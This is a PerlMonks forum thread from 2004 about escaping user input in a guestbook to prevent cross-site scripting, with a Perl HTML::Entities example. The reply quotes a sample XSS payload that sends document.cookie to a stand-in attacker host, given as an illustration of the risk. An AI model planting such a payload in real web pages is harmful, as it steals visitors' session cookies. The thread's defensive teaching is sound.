PerlMonks  

Re^2: Emergency! Our guestbook is getting trashed by HTML!

by amw1 (Friar)
on Dec 17, 2004 at 16:53 UTC [id://415692]


in reply to Re: Emergency! Our guestbook is getting trashed by HTML!
in thread Emergency! Our guestbook is getting trashed by HTML!

This or something similar should be in any code that re-displays user-entered input. HTML::Entities can do a very good job with this. While an unclosed <H1> may be inconvenient, this can be even worse:

    <script>document.location='http://nasty.site/cgi-bin/cookie.cgi?' +document.cookie</script>

Take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad".

In short: never display uncooked user input in a web page unless you have a very good reason to.
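The escaping step the post recommends, written out as an added example (this is not code from the original post or from the guestbook under discussion). It takes a constructed guestbook entry modelled on the payload quoted above and shows the difference between interpolating it straight into the page and running it through HTML::Entities first; the function names render_unsafe and render_safe are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example, not from the original post: escape a guestbook entry with
# HTML::Entities before echoing it back, so a stored <script> tag is rendered
# as literal text instead of being executed by the next visitor's browser.
use strict;
use warnings;
use HTML::Entities qw(encode_entities);

# Constructed sample entry, modelled on the cookie-stealing payload quoted
# in the post above. Not real data.
my $raw = q{<script>document.location='http://nasty.site/cgi-bin/cookie.cgi?' +document.cookie</script>};

# Unsafe: the raw string goes into the page unchanged, so the browser parses
# the <script> element and runs it.
sub render_unsafe {
    my ($entry) = @_;
    return "<p>$entry</p>";
}

# Safe: encode the characters that can start markup or terminate an attribute
# value (< > & " '). The second argument to encode_entities is the set of
# characters to escape; the default set (which also covers control and
# high-bit characters) would be fine too.
sub render_safe {
    my ($entry) = @_;
    return '<p>' . encode_entities($entry, q{<>&"'}) . '</p>';
}

# Sanity check a practitioner would want: after escaping, no raw angle
# brackets survive, so no tag can be opened by the visitor's text.
sub has_raw_markup {
    my ($html_fragment) = @_;
    my ($inner) = $html_fragment =~ m{^<p>(.*)</p>$}s;
    return defined $inner && $inner =~ /[<>]/ ? 1 : 0;
}

print "UNSAFE: ", render_unsafe($raw), "\n";
print "SAFE:   ", render_safe($raw), "\n";
print "raw markup left after escaping? ", has_raw_markup(render_safe($raw)) ? "yes" : "no", "\n";
```

The escaped form comes back as `&lt;script&gt;document.location=&#39;http://nasty.site/...&#39; +document.cookie&lt;/script&gt;`, which the browser displays verbatim. Note that this covers the HTML body context only: an entry placed inside an attribute value, a URL, or a JavaScript string needs the escaping appropriate to that context, and escaping on output is the step that matters regardless of whatever filtering was done on input.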

Re^3: Emergency! Our guestbook is getting trashed by HTML!
by manwhore (Initiate) on Jan 07, 2005 at 22:49 UTC
    Yah, you should look at http://www.shocking.com/~rsnake/xss.html There are a lot of risks there, it seems.
